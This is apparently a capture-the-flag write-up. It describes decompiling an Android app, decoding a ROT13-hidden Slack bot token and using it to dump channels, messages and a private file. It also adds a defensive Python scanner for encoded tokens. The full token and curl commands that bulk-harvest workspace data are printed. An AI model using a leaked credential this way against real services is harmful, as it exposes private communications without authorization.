Insert ChatGPT code? No level is called – Instant Gratification
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-40.png?resize=1024%2C402&ssl=1)
This level provides an APK and a form to submit the code.
Download and decompile the apk file. I use JADX-GUI.
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-41.png?resize=1024%2C380&ssl=1)
There is a leaked Slack API token.
It is ROT13-encoded, as the code suggests.
Back to CyberChef to get the ROT13 value of the token:
xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb
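A secret scan that only greps for the literal `xoxb-` prefix misses a token stored this way, because ROT13 turns the prefix into `kbko-`. The following added example (not code from the original post or the challenge APK) checks string literals in decompiled sources both as written and after ROT13; the sample Java source and token are constructed, and the pattern is generalized to the other `xox` token prefixes.

```python
import codecs
import re

# Slack token shape: xox<type>-<segments>. ROT13 leaves digits and '-' untouched,
# so an encoded token keeps its shape and only the letters rotate (xoxb -> kbko).
TOKEN_RE = re.compile(r"\b(xox[abprs])-[0-9A-Za-z-]{20,}")
STRING_LITERAL_RE = re.compile(r'"([^"\\]*(?:\\.[^"\\]*)*)"')


def rot13(text):
    return codecs.encode(text, "rot_13")


def scan_source(name, source):
    """Return findings for Slack-style tokens stored plain or ROT13-encoded."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for literal in STRING_LITERAL_RE.findall(line):
            for encoding, candidate in (("plain", literal), ("rot13", rot13(literal))):
                match = TOKEN_RE.search(candidate)
                if match:
                    findings.append({
                        "file": name, "line": lineno, "encoding": encoding,
                        "kind": match.group(1),
                        # Redact so the scanner's own report does not leak the token.
                        "redacted": match.group(0)[:9] + "...",
                    })
    return findings


# Constructed sample: a fake token, ROT13-encoded into a fake decompiled class.
FAKE_TOKEN = "xoxb-000000000000-000000000000-CONSTRUCTEDexampleTOKEN0"
SAMPLE_JAVA = f'''\
public class Config {{
    static final String API = "https://slack.com/api/";
    static final String KEY = "{rot13(FAKE_TOKEN)}";
    static String key() {{ return rot13(KEY); }}
}}
'''

if __name__ == "__main__":
    for finding in scan_source("Config.java", SAMPLE_JAVA):
        print(finding)
```

Run over the JADX export of a release build, a check like this flags the encoded literal before the APK ships.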
Used this token to get all channels.
curl "https://slack.com/api/conversations.list" -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channels.json
Too many channels. Now get all the messages in all channels.
cat channels.json | jq '.channels[].id' | xargs -I {} -P 10 curl "https://slack.com/api/conversations.history?channel={}&pretty=1" -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channel-chat-{}.json
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-42.png?resize=1024%2C637&ssl=1)
A lot of the messages are by the bot U05N6PBAFEJ. Let's filter those out.
cat channel-chat-* | jq '.messages[]|select(.user != "U05N6PBAFEJ")' > all.json
all.json has all the messages by members of that Slack workspace, and they have shared some files.
But the hint is in flag_txt.txt.
curl -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' https://files.slack.com/files-pri/T05MFCB49HU-F05NS2L16SD/flag_txt.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-43.png?resize=942%2C516&ssl=1)
Who shared this file? User U05ND262075
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-44.png?resize=942%2C395&ssl=1)
Using the Slack API, I found the username udhaya.prakash. I found his GitHub and Gist and got access to the gist mentioned in flag_txt.txt:
https://gist.github.com/sherlocksecurity/d45842c1a9849bd42bb3513d6769c0fe
Ran the JavaScript code in the Gist and found the flag XNYTH&6GjgSj7Z
Submitted it in the form and got the flag.